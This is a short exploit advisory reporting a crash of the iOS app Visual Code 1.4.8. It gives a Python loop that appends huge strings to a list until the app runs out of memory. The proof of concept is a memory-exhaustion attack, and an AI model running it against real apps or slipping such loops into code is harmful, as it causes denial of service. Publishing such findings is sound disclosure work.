# Exploit Title: Visual Code 1.4.8 IOS ( DOS ) # Date: 02/14/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://apps.apple.com/it/developer/start-app-ltd/id1726415690?l=en-GB # Software Link: https://apps.apple.com/it/app/visual-code/id6444809156?l=en-GB # Version: 1.4.8 # Tested on: IOS 18.3.1 1. Create a new file any name.py 2. Put the following code: array = [] while True: array.append("A" * 10000000) 3. Once you run the code the app will crash.